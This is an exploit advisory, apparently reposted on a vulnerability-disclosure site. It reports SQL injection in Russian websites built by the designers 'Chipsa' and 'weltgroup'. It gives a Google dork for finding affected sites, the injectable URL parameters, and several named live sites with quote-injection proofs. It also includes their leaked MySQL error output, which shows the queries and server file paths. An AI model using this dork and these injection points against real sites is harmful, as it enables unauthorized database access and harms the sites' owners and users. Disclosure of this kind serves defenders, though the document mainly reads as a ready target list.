Chipsa Hosting Дизайн: «Чипса» Разработка сайта: weltgroup Hosting Russia SQL Injection Vulnerability

################################################################################################# # Exploit Title : Chipsa Hosting Дизайн: «Чипса» Разработка сайта: weltgroup Hosting Russia SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 06/10/2018 # Vendor Homepage : chipsa.ru ~ weltgroup.ru # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Дизайн: «Чипса» Разработка сайта: weltgroup'' site:ru intext:''Разработка сайта Weltgroup'' site:ru # SQL Injection Exploit : /gallery.php?id=[SQL Injection] /search.php?more&id=[SQL Injection] /catalog/[ID-NUMBER]/?group=[SQL Injection] /search/?producer_code=[SQL Injection] ################################################################################################# # Example Vulnerable Sites => krascor.ru/gallery.php?id=9%27 => [ Proof of Concept ] => archive.is/0XZPz brakonierov.net/catalog/26/?group=26%27 => [ Proof of Concept ] => archive.is/O1KmR rosrelief.ru/search.php?more&id=1' # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 SELECT name from albums where id=9\' File: /usr/local/www/apache22/data/modules/siteconfig/functions.php Line: 307 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' order by id desc limit 0,1' at line 1 select * from partitions where page = ''' order by id desc limit 0,1 File: /home/www/rosrelief.ru/data/www/rosrelief.ru/inc/check_url.inc.php Line: 31 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''11'' group by pr.code, pr.article_id order by c.name' at line 2 select c.code, c.producer, c.name, pr.article_id, c.recipe from catalog c, price pr where c.code=pr.code and c.status='1' and ((c.name like '%%') or (c.mnn like '%%') or (pr.producer like '%%')) and c.country <> '11'' group by pr.code, pr.article_id order by c.name File: /home/www/brakonierov.net/data/www/brakonierov.net/sites/brakonierov/inc/search_result.php Line: 28 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

References:

https://www.cyberizm.org/cyberizm-chipsa-weltgroup-hosting-russia-sql-inj-exploit.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top